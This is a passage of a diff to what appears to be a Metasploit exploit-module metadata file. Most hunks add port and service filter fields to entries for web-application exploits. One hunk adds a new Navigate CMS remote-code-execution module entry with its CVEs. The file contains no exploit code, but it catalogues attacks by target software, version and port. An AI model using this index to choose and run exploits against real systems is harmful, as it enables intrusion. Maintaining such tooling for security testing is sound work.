"rport": 3790, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47012,6 +62234,21 @@ "platform": "", "arch": "cmd", "rport": 3790, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix", "Windows" @@ -47044,6 +62281,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "mma file uploader" ], @@ -47078,6 +62330,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -47115,6 +62382,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Monstra CMS 3.0.4" ], @@ -47148,6 +62430,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47185,6 +62482,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Movable Type 4.2x, 4.3x" ], @@ -47221,6 +62533,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix CMD", "Linux Payload" @@ -47254,6 +62581,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -47267,6 +62609,53 @@ "notes": { } }, + "exploit_multi/http/navigate_cms_rce": { + "name": "Navigate CMS Unauthenticated Remote Code Execution", + "full_name": "exploit/multi/http/navigate_cms_rce", + "rank": 600, + "disclosure_date": "2018-09-26", + "type": "exploit", + "author": [ + "Pyriphlegethon" + ], + "description": "This module exploits insufficient sanitization in the database::protect\n method, of Navigate CMS versions 2.8 and prior, to bypass authentication.\n\n The module then uses a path traversal vulnerability in navigate_upload.php\n that allows authenticated users to upload PHP files to arbitrary locations.\n Together these vulnerabilities allow an unauthenticated attacker to\n execute arbitrary PHP code remotely.\n\n This module was tested against Navigate CMS 2.8.", + "references": [ + "CVE-2018-17552", + "CVE-2018-17553" + ], + "is_server": true, + "is_client": false, + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2018-10-02 06:57:04 +0000", + "path": "/modules/exploits/multi/http/navigate_cms_rce.rb", + "is_install_path": true, + "ref_name": "multi/http/navigate_cms_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + } + }, "exploit_multi/http/netwin_surgeftp_exec": { "name": "Netwin SurgeFTP Remote Command Execution", "full_name": "exploit/multi/http/netwin_surgeftp_exec", @@ -47287,6 +62676,21 @@ "platform": "Unix,Windows", "arch": "", "rport": 7021, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -47322,6 +62726,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Nibbleblog 4.0.3" ], @@ -47355,6 +62774,21 @@ "platform": "Linux,Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Novell ServiceDesk / Linux", @@ -47390,6 +62824,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47423,6 +62872,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47459,6 +62923,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal", "Windows x86 (Native Payload)", @@ -47493,6 +62972,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47528,6 +63022,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP payload)" ], @@ -47561,6 +63070,21 @@ "platform": "Java", "arch": "java", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal" ], @@ -47595,6 +63119,21 @@ "platform": "Linux,Windows", "arch": "java", "rport": 8088, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "OATS <= 12.4.0.2.0 (Windows)", "OATS <= 12.4.0.2.0 (Linux)" @@ -47632,6 +63171,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Windows" @@ -47671,6 +63225,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 7001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Command payload", "Unix Command payload" @@ -47707,6 +63276,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 2480, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux", "Unix CMD", @@ -47741,6 +63325,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "osCommerce 2.3.4.1" ], @@ -47780,6 +63379,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -47814,6 +63428,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47854,6 +63483,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -47887,6 +63531,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PHP Utility Belt" ], @@ -47920,6 +63579,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PHP Volunteer Management 1.0.2" ], @@ -47954,6 +63628,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "phpFileManager / Unix", "phpFileManager / Windows" @@ -47991,6 +63680,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48028,6 +63732,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PHPMailer <5.2.18", "PHPMailer 5.2.18 - 5.2.19" @@ -48064,6 +63783,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PHPMoAdmin" ], @@ -48098,6 +63832,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48136,6 +63885,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -48175,6 +63939,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48213,6 +63992,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48248,6 +64042,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48281,6 +64090,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PhpTax 0.8" ], @@ -48317,6 +64141,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -48353,6 +64192,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PlaySMS 1.4" ], @@ -48386,6 +64240,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PlaySMS 1.4" ], @@ -48422,6 +64291,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48458,6 +64342,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48490,6 +64389,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -48524,6 +64438,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ProcessMaker Open Source 2.x (PHP Payload)" ], @@ -48555,6 +64484,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -48588,6 +64532,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -48620,6 +64579,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48655,6 +64629,21 @@ "platform": "BSD,Linux", "arch": "x86", "rport": 3000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Ruby on Rails 4.0.8 July 2, 2014" ], @@ -48689,6 +64678,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48721,6 +64725,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48757,6 +64776,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 3000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48793,6 +64827,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48828,6 +64877,21 @@ "platform": "Linux,Unix,Windows", "arch": "x86, x64, cmd", "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux (Native Payload)", "Linux (CMD Payload)", @@ -48864,6 +64928,21 @@ "platform": "Linux,PHP", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -48897,6 +64976,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "backdoor / Unix", "backdoor / Windows" @@ -48935,6 +65029,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -48967,6 +65076,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -49000,6 +65124,21 @@ "platform": "Linux,Windows", "arch": "java", "rport": 9000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Solarwinds Store Manager <= 5.7.1" ], @@ -49036,6 +65175,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SonicWALL GMS 6.0 Viewpoint / Java Universal", "SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2", @@ -49073,6 +65227,21 @@ "platform": "Linux,Windows", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Dell SonicWALL Scrutinizer 11.01 on Windows", @@ -49111,6 +65280,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal CMD" ], @@ -49147,6 +65331,21 @@ "platform": "Linux,Unix,Windows", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Splunk >= 5.0.1 / Linux", @@ -49181,6 +65380,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -49213,6 +65427,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -49249,6 +65478,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal" ], @@ -49285,6 +65529,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Universal" ], @@ -49322,6 +65581,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic detection", "Windows", @@ -49359,6 +65633,21 @@ "platform": "Linux,Python,Unix,Windows", "arch": "cmd, python, x86, x64", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix (In-Memory)", "Windows (In-Memory)", @@ -49398,6 +65687,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal" @@ -49439,6 +65743,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java", "Linux", @@ -49479,6 +65798,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49518,6 +65852,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49556,6 +65905,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Windows", @@ -49595,6 +65959,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Struts 2" ], @@ -49628,6 +66007,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49662,6 +66056,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49701,6 +66110,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows Universal", "Linux Universal", @@ -49736,6 +66160,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "stunshell" ], @@ -49769,6 +66208,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "stunshell / Unix", "stunshell / Windows" @@ -49802,6 +66256,21 @@ "platform": "Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Sun Java System Web Server 7.0 update 7 on Windows x86 (SEH)", "Debug Target" @@ -49835,6 +66304,21 @@ "platform": "Linux,Windows", "arch": "x86", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "SysAid Help Desk v14.4 / Linux", @@ -49869,6 +66353,21 @@ "platform": "Java", "arch": "java", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "SysAid Help Desk v14.3 - 14.4 / Java Universal" ], @@ -49903,6 +66402,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -49936,6 +66450,21 @@ "platform": "Linux,Windows", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Java Windows", @@ -49982,6 +66511,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "Java Universal", @@ -50029,6 +66573,21 @@ "platform": "Java,Linux,Windows", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Java Universal", "Windows Universal", @@ -50065,6 +66624,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50099,6 +66673,21 @@ "platform": "Linux", "arch": "x86", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Trend Micro Threat Discovery Appliance 2.6.1062r1" ], @@ -50132,6 +66721,21 @@ "platform": "PHP", "arch": "php", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Up.Time 7.0/7.2" ], @@ -50166,6 +66770,21 @@ "platform": "PHP", "arch": "php", "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50199,6 +66818,21 @@ "platform": "Unix,Windows", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "v0pCr3w / Unix", "v0pCr3w / Windows" @@ -50234,6 +66868,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50270,6 +66919,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "vBulletin 5.0.X", @@ -50305,6 +66969,21 @@ "platform": "Linux,Windows", "arch": "java", "rport": 8001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Visual Mining NetCharts Server 7.0" ], @@ -50338,6 +67017,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Vtiger 6.0.0 or older" ], @@ -50373,6 +67067,21 @@ "platform": "PHP", "arch": "php", "rport": 8888, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "vTiger CRM v6.3.0" ], @@ -50405,6 +67114,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -50445,6 +67169,21 @@ "platform": "PHP", "arch": 